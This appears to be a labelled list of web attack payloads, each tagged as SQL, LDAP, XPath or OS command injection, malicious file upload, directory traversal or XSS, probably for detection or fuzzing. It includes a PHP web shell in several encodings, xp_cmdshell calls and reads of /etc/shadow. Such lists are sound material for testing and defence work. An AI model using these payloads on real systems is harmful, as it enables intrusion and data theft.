@variable : SQL Injection Attack
,@variable : SQL Injection Attack
PRINT : SQL Injection Attack
PRINT @@variable : SQL Injection Attack
from : SQL Injection Attack
insert : SQL Injection Attack
procedure : SQL Injection Attack
limit : SQL Injection Attack
order by : SQL Injection Attack
asc : SQL Injection Attack
desc : SQL Injection Attack
delete : SQL Injection Attack
update : SQL Injection Attack
distinct : SQL Injection Attack
having : SQL Injection Attack
truncate : SQL Injection Attack
handler : SQL Injection Attack
bfilename : SQL Injection Attack
union : SQL Injection Attack
'%20-- : SQL Injection Attack
--'; : SQL Injection Attack
'%20; : SQL Injection Attack
=%20' : SQL Injection Attack
=%20; : SQL Injection Attack
=%20-- : SQL Injection Attack
'or%20select * : SQL Injection Attack
admin'-- : SQL Injection Attack
<>"'%;)(&+ : SQL Injection Attack
'%20or%20''=' : SQL Injection Attack
'%20or%20'x'='x : SQL Injection Attack
"%20or%20"x"="x : SQL Injection Attack
')%20or%20('x'='x : SQL Injection Attack
0 or 1=1 : SQL Injection Attack
' or 0=0 -- : SQL Injection Attack
" or 0=0 -- : SQL Injection Attack
or 0=0 -- : SQL Injection Attack
' or 0=0 # : SQL Injection Attack
" or 0=0 # : SQL Injection Attack
or 0=0 # : SQL Injection Attack
' or 1=1-- : SQL Injection Attack
" or 1=1-- : SQL Injection Attack
' or '1'='1'-- : SQL Injection Attack
"' or 1 --'" : SQL Injection Attack
or 1=1-- : SQL Injection Attack
or%201=1 : SQL Injection Attack
or%201=1 -- : SQL Injection Attack
' or 1=1 or ''=' : SQL Injection Attack
" or 1=1 or ""=" : SQL Injection Attack
' or a=a-- : SQL Injection Attack
" or "a"="a : SQL Injection Attack
') or ('a'='a : SQL Injection Attack
") or ("a"="a : SQL Injection Attack
hi" or "a"="a : SQL Injection Attack
hi" or 1=1 -- : SQL Injection Attack
hi' or 1=1 -- : SQL Injection Attack
hi' or 'a'='a : SQL Injection Attack
hi') or ('a'='a : SQL Injection Attack
hi") or ("a"="a : SQL Injection Attack
'hi' or 'x'='x'; : SQL Injection Attack
' or username like '% : SQL Injection Attack
' or uname like '% : SQL Injection Attack
' or userid like '% : SQL Injection Attack
' or uid like '% : SQL Injection Attack
' or user like '% : SQL Injection Attack
exec xp : SQL Injection Attack
exec sp : SQL Injection Attack
'; exec master..xp_cmdshell : SQL Injection Attack
'; exec xp_regread : SQL Injection Attack
t'exec master..xp_cmdshell 'nslookup www.google.com'-- : SQL Injection Attack
--sp_password : SQL Injection Attack
' UNION SELECT : SQL Injection Attack
' UNION ALL SELECT : SQL Injection Attack
' or (EXISTS) : SQL Injection Attack
' (select top 1 : SQL Injection Attack
'||UTL_HTTP.REQUEST : SQL Injection Attack
1;SELECT%20\* : SQL Injection Attack
to_timestamp_tz : SQL Injection Attack
tz_offset : SQL Injection Attack
&lt;&gt;&quot;'%;)(&amp;+ : SQL Injection Attack
'%20or%201=1 : SQL Injection Attack
%27%20or%201=1 : SQL Injection Attack
%20$(sleep%2050) : SQL Injection Attack
%20'sleep%2050' : SQL Injection Attack
char%4039%41%2b%40SELECT : SQL Injection Attack
&apos;%20OR : SQL Injection Attack
'sqlattempt1 : SQL Injection Attack
(sqlattempt2) : SQL Injection Attack
*(|(mail=*)) : SQL Injection Attack
%2A%28%7C%28mail%3D%2A%29%29 : SQL Injection Attack
*(|(objectclass=*)) : SQL Injection Attack
%2A%28%7C%28objectclass%3D%2A%29%29 : SQL Injection Attack
' or 1=1 or ''=' : SQL Injection Attack
' or ''=' : SQL Injection Attack
x' or 1=1 or 'x'='y : SQL Injection Attack
 union select  : SQL Injection Attack
+union+select+ : SQL Injection Attack
/**/union/**/select/**/ : SQL Injection Attack
/**/UNunionION/**/SELselectECT/**/ : SQL Injection Attack
/**//*UnIOn*//**//*SEleCt*//**/ : SQL Injection Attack
/**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/ : SQL Injection Attack
 union all select  : SQL Injection Attack
+union+all+select+ : SQL Injection Attack
/**/union/**/all/**/select/**/ : SQL Injection Attack
/**/UNunionION/**/all/**/SELselectECT/**/ : SQL Injection Attack
/**//*UnIOn*//**/all/**//*SEleCt*//**/ : SQL Injection Attack
/**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/ : SQL Injection Attack
 waitfor delay '0:0:10'-- : SQL Injection Attack
+waitfor+delay+'0:0:10'-- : SQL Injection Attack
/**/waitfor/**/delay/**/'0:0:10'-- : SQL Injection Attack
%20waitfor%20delay%20'0:0:20'-- : SQL Injection Attack
 waitfor delay '0:0:10'/* : SQL Injection Attack
+waitfor+delay+'0:0:10'/* : SQL Injection Attack
/**/waitfor/**/delay/**/'0:0:10'/* : SQL Injection Attack
%20waitfor%20delay%20'0:0:20'/* : SQL Injection Attack
'  waitfor delay '0:0:10'--+ : SQL Injection Attack
'+waitfor+delay+'0:0:10'--+ : SQL Injection Attack
'/**/ waitfor/**/delay/**/'0:0:10'--+ : SQL Injection Attack
'%20waitfor%20delay%20'0:0:20'--+ : SQL Injection Attack
 and 0=benchmark(3000000,MD5(1))-- : SQL Injection Attack
+and+0=benchmark(3000000,MD5(1))+-- : SQL Injection Attack
/**/and/**/0=benchmark(3000000,MD5(1))/**/-- : SQL Injection Attack
%20and%200=benchmark(3000000,MD5(1))%20-- : SQL Injection Attack
 and 0=benchmark(3000000,MD5(1))/* : SQL Injection Attack
+and+0=benchmark(3000000,MD5(1))+/* : SQL Injection Attack
/**/and/**/0=benchmark(3000000,MD5(1))/**//* : SQL Injection Attack
%20and%200=benchmark(3000000,MD5(1))%20/* : SQL Injection Attack
' and 0=benchmark(3000000,MD5(1))--+ : SQL Injection Attack
'+and+0=benchmark(3000000,MD5(1))+--+ : SQL Injection Attack
'/**/and/**/0=benchmark(3000000,MD5(1))/**/--+ : SQL Injection Attack
'%20and%200=benchmark(3000000,MD5(1))%20--+ : SQL Injection Attack
sleep(__TIME__)# : SQL Injection Attack
1 or sleep(__TIME__)# : SQL Injection Attack
" or sleep(__TIME__)# : SQL Injection Attack
' or sleep(__TIME__)# : SQL Injection Attack
" or sleep(__TIME__)=" : SQL Injection Attack
' or sleep(__TIME__)=' : SQL Injection Attack
1) or sleep(__TIME__)# : SQL Injection Attack
") or sleep(__TIME__)=" : SQL Injection Attack
') or sleep(__TIME__)=' : SQL Injection Attack
1)) or sleep(__TIME__)# : SQL Injection Attack
")) or sleep(__TIME__)=" : SQL Injection Attack
')) or sleep(__TIME__)=' : SQL Injection Attack
pg_sleep(__TIME__)-- : SQL Injection Attack
1 or pg_sleep(__TIME__)-- : SQL Injection Attack
" or pg_sleep(__TIME__)-- : SQL Injection Attack
' or pg_sleep(__TIME__)-- : SQL Injection Attack
1) or pg_sleep(__TIME__)-- : SQL Injection Attack
") or pg_sleep(__TIME__)-- : SQL Injection Attack
') or pg_sleep(__TIME__)-- : SQL Injection Attack
1)) or pg_sleep(__TIME__)-- : SQL Injection Attack
")) or pg_sleep(__TIME__)-- : SQL Injection Attack
')) or pg_sleep(__TIME__)-- : SQL Injection Attack
<?system('id');?> : SQL Injection Attack
<?system('uname -a');?> : SQL Injection Attack
<?php phpinfo(); ?> : SQL Injection Attack
<? system($_GET['c']); ?> : SQL Injection Attack
0x3c3f2073797374656d28245f4745545b2763275d293b203f3e : SQL Injection Attack
PD8gc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg== : SQL Injection Attack
%3C%3F%20system%28%24_GET%5B%27c%27%5D%29%3B%20%3F%3E : SQL Injection Attack
char(60,63,32,115,121,115,116,101,109,40,36,95,71,69,84,91,39,99,39,93,41,59,32,63,62) : SQL Injection Attack
data:;base64,PD8gZXhlYygkX0dFVFtjbWRdKTsgPz4=&cmd=whoami : SQL Injection Attack
data:;base64,PD8gZXhlYygkX0dFVFtjbWRdKTsgPz4=&cmd=whoami : SQL Injection Attack
data:;base64,<? exec($_GET[cmd]); ?>&cmd=whoami : SQL Injection Attack
 and 1=1-- : SQL Injection Attack
 and 1=2-- : SQL Injection Attack
 and 5050=5050-- : SQL Injection Attack
 and 5050=5051-- : SQL Injection Attack
 and substring(@@version,1,1)=4-- : SQL Injection Attack
 and substring(@@version,1,1)=5-- : SQL Injection Attack
 and ORD(MID((VERSION()), N, 1)) Insert<>=Comparer<InsertCharValueHere>-- : SQL Injection Attack
 and (SELECT 1 from admin limit 0,1)=1-- : SQL Injection Attack
 and (SELECT 1 from tblAdmin limit 0,1)=1-- : SQL Injection Attack
 and (SELECT 1 from Administrator limit 0,1)=1-- : SQL Injection Attack
 and (SELECT 1 from tbl_admin limit 0,1)=1-- : SQL Injection Attack
 and (SELECT 1 from user limit 0,1)=1-- : SQL Injection Attack
 and (SELECT 1 from users limit 0,1)=1-- : SQL Injection Attack
 and (SELECT 1 from TableName limit 0,1)=1-- : SQL Injection Attack
 and (SELECT substring(concat(1,ID),1,1) from admin limit 0,1)=1-- : SQL Injection Attack
 and (SELECT substring(concat(1,name),1,1) from tblAdmin limit 0,1)=1-- : SQL Injection Attack
 and (SELECT substring(concat(1,login),1,1) from Administrator limit 0,1)=1-- : SQL Injection Attack
 and (SELECT substring(concat(1,password),1,1) from user limit 0,1)=1-- : SQL Injection Attack
 and (SELECT substring(concat(1,email),1,1) from users limit 0,1)=1-- : SQL Injection Attack
 and (SELECT substring(concat(1,<insert-column-guess-here>),1,1) from <table-name> limit 0,1)=1-- : SQL Injection Attack
 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>65-- : SQL Injection Attack
 and 1=1 : SQL Injection Attack
 and 1=2 : SQL Injection Attack
 and 1>2 : SQL Injection Attack
 and 1<=2 : SQL Injection Attack
+and+1=1 : SQL Injection Attack
+and+1=2 : SQL Injection Attack
+and+1>2 : SQL Injection Attack
+and+1<=2 : SQL Injection Attack
/**/and/**/1=1 : SQL Injection Attack
/**/and/**/1=2 : SQL Injection Attack
/**/and/**/1>2 : SQL Injection Attack
/**/and/**/1<=2 : SQL Injection Attack
/**/or/**/1/**/=/**/1 : SQL Injection Attack
/**/or/**/1/**/=/**/2 : SQL Injection Attack
/**/or/**/1/**/>/**/2 : SQL Injection Attack
/**/or/**/1/**/<=/**/2 : SQL Injection Attack
 and 50=50 : SQL Injection Attack
 and 50=52 : SQL Injection Attack
 and 50>52 : SQL Injection Attack
 and 50<=52 : SQL Injection Attack
+and+50=50 : SQL Injection Attack
+and+50=52 : SQL Injection Attack
+and+50>52 : SQL Injection Attack
+and+50<=52 : SQL Injection Attack
/**/and/**/50=50 : SQL Injection Attack
/**/and/**/50=52 : SQL Injection Attack
/**/and/**/50>52 : SQL Injection Attack
/**/and/**/50<=52 : SQL Injection Attack
/**/or/**/51/**/=/**/51 : SQL Injection Attack
/**/or/**/51/**/=/**/52 : SQL Injection Attack
/**/or/**/51/**/>/**/52 : SQL Injection Attack
/**/or/**/51/**/<=/**/52 : SQL Injection Attack
 waitfor delay '0:0:10'-- : SQL Injection Attack
; waitfor delay '0:0:10'-- : SQL Injection Attack
+waitfor+delay+'0:0:10'-- : SQL Injection Attack
/**/waitfor/**/delay/**/'0:0:10'- : SQL Injection Attack-
%20waitfor%20delay%20'0:0:20'-- : SQL Injection Attack
 waitfor delay '0:0:10'-- : SQL Injection Attack
; waitfor delay '0:0:10'-- : SQL Injection Attack
+waitfor+delay+'0:0:10'/* : SQL Injection Attack
/**/waitfor/**/delay/**/'0:0:10'/\ : SQL Injection Attack*
%20waitfor%20delay%20'0:0:20'/* : SQL Injection Attack
'  waitfor delay '0:0:10'--+ : SQL Injection Attack
'+waitfor+delay+'0:0:10'--+ : SQL Injection Attack
'/**/ waitfor/**/delay/**/'0:0:10'--+ : SQL Injection Attack
'%20waitfor%20delay%20'0:0:20'--+ : SQL Injection Attack
 and 0=benchmark(3000000,MD5(1))-- : SQL Injection Attack
+and+0=benchmark(3000000,MD5(1))+-- : SQL Injection Attack
/**/and/**/0=benchmark(3000000,MD5(1))/**/-- : SQL Injection Attack
%20and%200=benchmark(3000000,MD5(1))%20-- : SQL Injection Attack
; and 0=benchmark(3000000,MD5(1))/* : SQL Injection Attack
 and 0=benchmark(3000000,MD5(1))/* : SQL Injection Attack
+and+0=benchmark(3000000,MD5(1))+/* : SQL Injection Attack
/**/and/**/0=benchmark(3000000,MD5(1))/**//* : SQL Injection Attack
%20and%200=benchmark(3000000,MD5(1))%20/* : SQL Injection Attack
' and 0=benchmark(3000000,MD5(1))--+ : SQL Injection Attack
'+and+0=benchmark(3000000,MD5(1))+--+ : SQL Injection Attack
'/**/and/**/0=benchmark(3000000,MD5(1))/**/--+ : SQL Injection Attack
'%20and%200=benchmark(3000000,MD5(1))%20--+ : SQL Injection Attack
sleep(__TIME__)# : SQL Injection Attack
1 or sleep(__TIME__)# : SQL Injection Attack
" or sleep(__TIME__)# : SQL Injection Attack
' or sleep(__TIME__)# : SQL Injection Attack
" or sleep(__TIME__)=" : SQL Injection Attack
' or sleep(__TIME__)=' : SQL Injection Attack
1) or sleep(__TIME__)# : SQL Injection Attack
") or sleep(__TIME__)=" : SQL Injection Attack
') or sleep(__TIME__)=' : SQL Injection Attack
1)) or sleep(__TIME__)# : SQL Injection Attack
")) or sleep(__TIME__)=" : SQL Injection Attack
')) or sleep(__TIME__)=' : SQL Injection Attack
pg_sleep(__TIME__)-- : SQL Injection Attack
1 or pg_sleep(__TIME__)-- : SQL Injection Attack
" or pg_sleep(__TIME__)-- : SQL Injection Attack
' or pg_sleep(__TIME__)-- : SQL Injection Attack
1) or pg_sleep(__TIME__)-- : SQL Injection Attack
") or pg_sleep(__TIME__)-- : SQL Injection Attack
') or pg_sleep(__TIME__)-- : SQL Injection Attack
1)) or pg_sleep(__TIME__)-- : SQL Injection Attack
")) or pg_sleep(__TIME__)-- : SQL Injection Attack
')) or pg_sleep(__TIME__)-- : SQL Injection Attack
%2A%28%7C%28mail%3D%2A%29%29 : LDAP Injection Attack
%2A%28%7C%28objectclass%3D%2A%29%29 : LDAP Injection Attack
%2A%7C : LDAP Injection Attack
*(|(mail=*)) : LDAP Injection Attack
*(|(objectclass=*)) : LDAP Injection Attack
x' or name()='username' or 'x'='y : LDAP Injection Attack
*()|&' : LDAP Injection Attack
admin\* : LDAP Injection Attack
admin*)((|userpassword=*) : LDAP Injection Attack
*)(uid=*))(|(uid=* : LDAP Injection Attack
*()|%26' : LDAP Injection Attack
phtml : Malicious File Upload Attack
php3 : Malicious File Upload Attack
php4 : Malicious File Upload Attack
php5 : Malicious File Upload Attack
pHtml : Malicious File Upload Attack
pHp3 : Malicious File Upload Attack
pHp4 : Malicious File Upload Attack
pHp5 : Malicious File Upload Attack
asa : Malicious File Upload Attack
iNc%00 : Malicious File Upload Attack
iNc%20%20%20 : Malicious File Upload Attack
iNc%20%20%20...%20.%20.. : Malicious File Upload Attack
iNc...... : Malicious File Upload Attack
inc%00 : Malicious File Upload Attack
inc%20%20%20 : Malicious File Upload Attack
inc%20%20%20...%20.%20.. : Malicious File Upload Attack
inc...... : Malicious File Upload Attack
pHp%00 : Malicious File Upload Attack
pHp%20%20%20 : Malicious File Upload Attack
pHp%20%20%20...%20.%20.. : Malicious File Upload Attack
pHp...... : Malicious File Upload Attack
pHp3%00 : Malicious File Upload Attack
pHp3%20%20%20 : Malicious File Upload Attack
pHp3%20%20%20...%20.%20.. : Malicious File Upload Attack
pHp3...... : Malicious File Upload Attack
pHp4%00 : Malicious File Upload Attack
pHp4%20%20%20 : Malicious File Upload Attack
pHp4%20%20%20...%20.%20.. : Malicious File Upload Attack
pHp4...... : Malicious File Upload Attack
pHp5%00 : Malicious File Upload Attack
pHp5%20%20%20 : Malicious File Upload Attack
pHp5%20%20%20...%20.%20.. : Malicious File Upload Attack
pHp5...... : Malicious File Upload Attack
pHtml%00 : Malicious File Upload Attack
pHtml%20%20%20 : Malicious File Upload Attack
pHtml%20%20%20...%20.%20.. : Malicious File Upload Attack
pHtml...... : Malicious File Upload Attack
php%00 : Malicious File Upload Attack
php%20%20%20 : Malicious File Upload Attack
php%20%20%20...%20.%20.. : Malicious File Upload Attack
php...... : Malicious File Upload Attack
php3%00 : Malicious File Upload Attack
php3%20%20%20 : Malicious File Upload Attack
php3%20%20%20...%20.%20.. : Malicious File Upload Attack
php3...... : Malicious File Upload Attack
php4%00 : Malicious File Upload Attack
php4%20%20%20 : Malicious File Upload Attack
php4%20%20%20...%20.%20.. : Malicious File Upload Attack
php4...... : Malicious File Upload Attack
php5%00 : Malicious File Upload Attack
php5%20%20%20 : Malicious File Upload Attack
php5%20%20%20...%20.%20.. : Malicious File Upload Attack
php5...... : Malicious File Upload Attack
phtml%00 : Malicious File Upload Attack
phtml%20%20%20 : Malicious File Upload Attack
phtml%20%20%20...%20.%20.. : Malicious File Upload Attack
phtml...... : Malicious File Upload Attack
asp%20%20%20 : Malicious File Upload Attack
aspx%20%20%20 : Malicious File Upload Attack
asa%20%20%20 : Malicious File Upload Attack
aSP%20%20%20 : Malicious File Upload Attack
aSpx%20%20%20 : Malicious File Upload Attack
aSa%20%20%20 : Malicious File Upload Attack
asp...... : Malicious File Upload Attack
aspx...... : Malicious File Upload Attack
asa...... : Malicious File Upload Attack
aSP...... : Malicious File Upload Attack
aSpx...... : Malicious File Upload Attack
aSa...... : Malicious File Upload Attack
asp%20%20%20...%20.%20.. : Malicious File Upload Attack
aspx%20%20%20...%20.%20.. : Malicious File Upload Attack
asa%20%20%20...%20.%20.. : Malicious File Upload Attack
aSP%20%20%20...%20.%20.. : Malicious File Upload Attack
aSpx%20%20%20...%20.%20.. : Malicious File Upload Attack
aSa%20%20%20...%20.%20.. : Malicious File Upload Attack
asp%00 : Malicious File Upload Attack
aspx%00 : Malicious File Upload Attack
asa%00 : Malicious File Upload Attack
aSp%00 : Malicious File Upload Attack
aSpx%00 : Malicious File Upload Attack
aSa%00 : Malicious File Upload Attack
cfm : Malicious File Upload Attack
cfml : Malicious File Upload Attack
cfc : Malicious File Upload Attack
dbm : Malicious File Upload Attack
cFm : Malicious File Upload Attack
cFml : Malicious File Upload Attack
cFc : Malicious File Upload Attack
dBm : Malicious File Upload Attack
cfm%20%20%20 : Malicious File Upload Attack
cfml%20%20%20 : Malicious File Upload Attack
cfc%20%20%20 : Malicious File Upload Attack
dbm%20%20%20 : Malicious File Upload Attack
cFm%20%20%20 : Malicious File Upload Attack
cFml%20%20%20 : Malicious File Upload Attack
cFc%20%20%20 : Malicious File Upload Attack
dBm%20%20%20 : Malicious File Upload Attack
cfm...... : Malicious File Upload Attack
cfml...... : Malicious File Upload Attack
cfc....... : Malicious File Upload Attack
dbm...... : Malicious File Upload Attack
cFm...... : Malicious File Upload Attack
cFml...... : Malicious File Upload Attack
cFc...... : Malicious File Upload Attack
dBm...... : Malicious File Upload Attack
cfm%20%20%20...%20.%20.. : Malicious File Upload Attack
cfml%20%20%20...%20.%20.. : Malicious File Upload Attack
cfc%20%20%20...%20.%20.. : Malicious File Upload Attack
dbm%20%20%20...%20.%20.. : Malicious File Upload Attack
cFm%20%20%20...%20.%20.. : Malicious File Upload Attack
cFml%20%20%20...%20.%20.. : Malicious File Upload Attack
cFc%20%20%20...%20.%20.. : Malicious File Upload Attack
dBm%20%20%20...%20.%20.. : Malicious File Upload Attack
cfm%00 : Malicious File Upload Attack
cfml%00 : Malicious File Upload Attack
cfc%00 : Malicious File Upload Attack
dbm%00 : Malicious File Upload Attack
cFm%00 : Malicious File Upload Attack
cFml%00 : Malicious File Upload Attack
cFc%00 : Malicious File Upload Attack
dBm%00 : Malicious File Upload Attack
jspx : Malicious File Upload Attack
jsw : Malicious File Upload Attack
jsv : Malicious File Upload Attack
jspf : Malicious File Upload Attack
jSpx : Malicious File Upload Attack
jSw : Malicious File Upload Attack
jSv : Malicious File Upload Attack
jSpf : Malicious File Upload Attack
jSp%00 : Malicious File Upload Attack
jSp%20%20%20 : Malicious File Upload Attack
jSp%20%20%20...%20.%20..a : Malicious File Upload Attack
jSp...... : Malicious File Upload Attack
jSpf%00 : Malicious File Upload Attack
jSpf%20%20%20 : Malicious File Upload Attack
jSpf%20%20%20...%20.%20..a : Malicious File Upload Attack
jSpf...... : Malicious File Upload Attack
jSpx%00 : Malicious File Upload Attack
jSpx%20%20%20 : Malicious File Upload Attack
jSpx%20%20%20...%20.%20..a : Malicious File Upload Attack
jSpx...... : Malicious File Upload Attack
jSv%00 : Malicious File Upload Attack
jSv%20%20%20 : Malicious File Upload Attack
jSv%20%20%20...%20.%20..a : Malicious File Upload Attack
jSv...... : Malicious File Upload Attack
jSw%00 : Malicious File Upload Attack
jSw%20%20%20 : Malicious File Upload Attack
jSw%20%20%20...%20.%20..a : Malicious File Upload Attack
jSw...... : Malicious File Upload Attack
jsp%00 : Malicious File Upload Attack
jsp%20%20%20 : Malicious File Upload Attack
jsp%20%20%20...%20.%20..a : Malicious File Upload Attack
jsp...... : Malicious File Upload Attack
jspf%00 : Malicious File Upload Attack
jspf%20%20%20 : Malicious File Upload Attack
jspf%20%20%20...%20.%20..a : Malicious File Upload Attack
jspf...... : Malicious File Upload Attack
jspx%00 : Malicious File Upload Attack
jspx%20%20%20 : Malicious File Upload Attack
jspx%20%20%20...%20.%20..a : Malicious File Upload Attack
jspx...... : Malicious File Upload Attack
jsv%00 : Malicious File Upload Attack
jsv%20%20%20 : Malicious File Upload Attack
jsv%20%20%20...%20.%20..a : Malicious File Upload Attack
jsv...... : Malicious File Upload Attack
jsw%00 : Malicious File Upload Attack
jsw%20%20%20 : Malicious File Upload Attack
jsw%20%20%20...%20.%20..a : Malicious File Upload Attack
jsw...... : Malicious File Upload Attack
' or '1'='1 : XPath Injection Attack
' or ''=' : XPath Injection Attack
x' or 1=1 or 'x'='y : XPath Injection Attack
count(/child::node()) : XPath Injection Attack
x' or name()='username' or 'x'='y : XPath Injection Attack
' and count(/*)=1 and '1'='1 : XPath Injection Attack
' and count(/@*)=1 and '1'='1 : XPath Injection Attack
' and count(/comment())=1 and '1'='1 : XPath Injection Attack
uname -n -s : OS Command Injection Attack
whoami|pwd : OS Command Injection Attack
cat /etc/passwd : OS Command Injection Attack
ls -la /tmp : OS Command Injection Attack
ls -la /home : OS Command Injection Attack
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt; : OS Command Injection Attack
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt; : OS Command Injection Attack
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt; : OS Command Injection Attack
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt; : OS Command Injection Attack
/index.html|id| : OS Command Injection Attack
;id; : OS Command Injection Attack
;id : OS Command Injection Attack
;netstat -a; : OS Command Injection Attack
;id; : OS Command Injection Attack
|id : OS Command Injection Attack
|/usr/bin/id : OS Command Injection Attack
|id| : OS Command Injection Attack
|/usr/bin/id| : OS Command Injection Attack
||/usr/bin/id| : OS Command Injection Attack
|id; : OS Command Injection Attack
||/usr/bin/id; : OS Command Injection Attack
;id| : OS Command Injection Attack
;|/usr/bin/id| : OS Command Injection Attack
\n/bin/ls -al\n : OS Command Injection Attack
\n/usr/bin/id\n : OS Command Injection Attack
\nid\n : OS Command Injection Attack
\n/usr/bin/id; : OS Command Injection Attack
\nid; : OS Command Injection Attack
\n/usr/bin/id| : OS Command Injection Attack
\nid| : OS Command Injection Attack
;/usr/bin/id\n : OS Command Injection Attack
;id\n : OS Command Injection Attack
|usr/bin/id\n : OS Command Injection Attack
|nid\n : OS Command Injection Attack
`id` : OS Command Injection Attack
`/usr/bin/id` : OS Command Injection Attack
a);id : OS Command Injection Attack
a;id : OS Command Injection Attack
a);id; : OS Command Injection Attack
a;id; : OS Command Injection Attack
a);id| : OS Command Injection Attack
a;id| : OS Command Injection Attack
a)|id : OS Command Injection Attack
a|id : OS Command Injection Attack
a)|id; : OS Command Injection Attack
a|id : OS Command Injection Attack
|/bin/ls -al : OS Command Injection Attack
a);/usr/bin/id : OS Command Injection Attack
a;/usr/bin/id : OS Command Injection Attack
a);/usr/bin/id; : OS Command Injection Attack
a;/usr/bin/id; : OS Command Injection Attack
a);/usr/bin/id| : OS Command Injection Attack
a;/usr/bin/id| : OS Command Injection Attack
a)|/usr/bin/id : OS Command Injection Attack
a|/usr/bin/id : OS Command Injection Attack
a)|/usr/bin/id; : OS Command Injection Attack
a|/usr/bin/id : OS Command Injection Attack
;system('cat%20/etc/passwd') : OS Command Injection Attack
;system('id') : OS Command Injection Attack
;system('/usr/bin/id') : OS Command Injection Attack
%0Acat%20/etc/passwd : OS Command Injection Attack
%0A/usr/bin/id : OS Command Injection Attack
%0Aid : OS Command Injection Attack
%0A/usr/bin/id%0A : OS Command Injection Attack
%0Aid%0A : OS Command Injection Attack
& ping -i 30 127.0.0.1 : OS Command Injection Attack &
& ping -n 30 127.0.0.1 & : OS Command Injection Attack
%0a ping -i 30 127.0.0.1 %0a : OS Command Injection Attack
`ping 127.0.0.1` : OS Command Injection Attack
| id : OS Command Injection Attack
& id : OS Command Injection Attack
; id : OS Command Injection Attack
%0a id %0a : OS Command Injection Attack
`id` : OS Command Injection Attack
$;/usr/bin/id : OS Command Injection Attack
/etc/passwd : Directory Traversal Attack
/etc/shadow : Directory Traversal Attack
/apache/logs/error.log  : Directory Traversal Attack
/apache/logs/access.log  : Directory Traversal Attack
/apache/logs/error.log  : Directory Traversal Attack
/apache/logs/access.log  : Directory Traversal Attack
/apache/logs/error.log  : Directory Traversal Attack
/apache/logs/access.log  : Directory Traversal Attack
/etc/httpd/logs/acces_log  : Directory Traversal Attack
/etc/httpd/logs/acces.log  : Directory Traversal Attack
/etc/httpd/logs/error_log  : Directory Traversal Attack
/etc/httpd/logs/error.log  : Directory Traversal Attack
/var/www/logs/access_log  : Directory Traversal Attack
/var/www/logs/access.log  : Directory Traversal Attack
/usr/local/apache/logs/access_log  : Directory Traversal Attack
/usr/local/apache/logs/access.log  : Directory Traversal Attack
/var/log/apache/access_log  : Directory Traversal Attack
/var/log/apache2/access_log  : Directory Traversal Attack
/var/log/apache/access.log  : Directory Traversal Attack
/var/log/apache2/access.log  : Directory Traversal Attack
/var/log/access_log  : Directory Traversal Attack
/var/log/access.log  : Directory Traversal Attack
/var/www/logs/error_log  : Directory Traversal Attack
/var/www/logs/error.log  : Directory Traversal Attack
/usr/local/apache/logs/error_log  : Directory Traversal Attack
/usr/local/apache/logs/error.log  : Directory Traversal Attack
/var/log/apache/error_log  : Directory Traversal Attack
/var/log/apache2/error_log  : Directory Traversal Attack
/var/log/apache/error.log  : Directory Traversal Attack
/var/log/apache2/error.log  : Directory Traversal Attack
/var/log/error_log  : Directory Traversal Attack
/var/log/error.log  : Directory Traversal Attack
<script>alert('Zer0Lulz')</script> : XSS Attack
<ScRiPt>AlErT('XSS')</ScRiPt> : XSS Attack
"><script>alert('XSS')</script> : XSS Attack
"><ScRiPt>AlErT('XSS')</ScRiPt> : XSS Attack
=><><script>alert('XSS')</script> : XSS Attack
=><><ScRiPt>AlErT('XSS')</ScRiPt> : XSS Attack
="><script>alert('XSS')</script> : XSS Attack
="><ScRiPt>AlErT('XSS')</ScRiPt> : XSS Attack
='><script>alert('XSS')</script> : XSS Attack
='><ScRiPt>AlErT('XSS')</ScRiPt> : XSS Attack
="><<script>alert('XSS')</script> : XSS Attack
="><<ScRiPt>AlErT('XSS')</ScRiPt> : XSS Attack
='><<script>alert('XSS')</script> : XSS Attack
='><<ScRiPt>AlErT('XSS')</ScRiPt> : XSS Attack
<script>alert(String.fromCharCode(88, 83, 83)</script> : XSS Attack
<ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS Attack
"><script>alert(String.fromCharCode(88, 83, 83)</script> : XSS Attack
"><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS Attack
=><><script>alert(String.fromCharCode(88, 83, 83)</script> : XSS Attack
=><><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS Attack
="><script>alert(String.fromCharCode(88, 83, 83)</script> : XSS Attack
="><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS Attack
='><script>alert(String.fromCharCode(88, 83, 83)</script> : XSS Attack
='><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS Attack
="><<script>alert(String.fromCharCode(88, 83, 83)</script> : XSS Attack
="><<ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS Attack
='><<script>alert(String.fromCharCode(88, 83, 83)</script> : XSS Attack
='><<ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt> : XSS Attack
"%3e%3cscript%3ealert('XSS')%3c%2fscript%3e : XSS Attack
"%3e%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e : XSS Attack
=%3e%3c%3e%3cscript>alert('XSS')%3c%2fscript%3e : XSS Attack
=%3e%3c%3e%3cScRiPt>AlErT('XSS')%3c%2fScRiPt%3e : XSS Attack
="%3e%3cscript%3ealert('XSS')%3c%2fscript%3e : XSS Attack
="%3e%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e : XSS Attack
='%3e%3cscript%3ealert('XSS')%3c%2fscript%3e : XSS Attack
='%3e%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e : XSS Attack
="%3e%3c%3cscript%3ealert('XSS')%3c%2fscript%3e : XSS Attack
="%3e%3c%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e : XSS Attack
='%3e%3c%3cscript%3ealert('XSS')%3c%2fscript%3e : XSS Attack
='%3e%3c%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e : XSS Attack
\\><script>alert('XSS')</script> : XSS Attack
